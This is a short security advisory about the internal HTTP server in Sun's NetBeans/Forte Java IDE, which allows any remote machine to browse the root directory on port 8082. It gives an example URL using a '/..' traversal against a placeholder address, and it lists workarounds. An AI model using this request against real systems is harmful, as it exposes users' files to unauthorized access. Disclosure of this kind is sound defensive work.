Vulnerability

    NetBeans/ Forte' Java IDE HTTP

Affected

    Sun Microsystems NetBeans (recently renamed to Forte') Java IDE

Description

    Halcyon   Skinner   found   following   (Versions  tested:Netbeans
    Developer 3.0 Beta and  Forte Community Edition 1.0  Beta; unknown
    if  earlier  versions  have  vulnerability.   The  IDE includes an
    internal HTTP  server to  try Java  code.   The settings  indicate
    that access must be explicitly granted on a per IP address  bases.
    However, when service is enabled for one machine, the HTTP  server
    allows  remote  access  to  root  and  all subdirectories from any
    machine.   NOTE, for  the NetBeans  3.0 Beta  version, this is the
    default activity.   Therefore, no action  is required by  the user
    for  the  vulnerability  to  exist.   Under  the  Forte'  1.0 Beta
    version,  a  user  must  enable  at  least one address in the HTTP
    server settings for the vulnerability  to exist.  However, once  a
    single  IP  address  is  entered,  any  machine can connect to the
    internal  HTTP  server  port  (default  is  8082).  Even if all IP
    addresses are removed, the  server continues to allow  connections
    when the IDE is running.

    Example.  While the IDE is running connecting with any browser to

        http://vvv.xxx.yyy.zzz:8082/..

    provides a  listing of  the root  directory.   Sub-directories can
    then be accessed.

Solution

    Solution (work around):

        1) Set the  HTTP Server "Enable"  setting to False  in Project
           settings
        2) Remove the HTTP Server module in Global settings

    Vendor has been notified.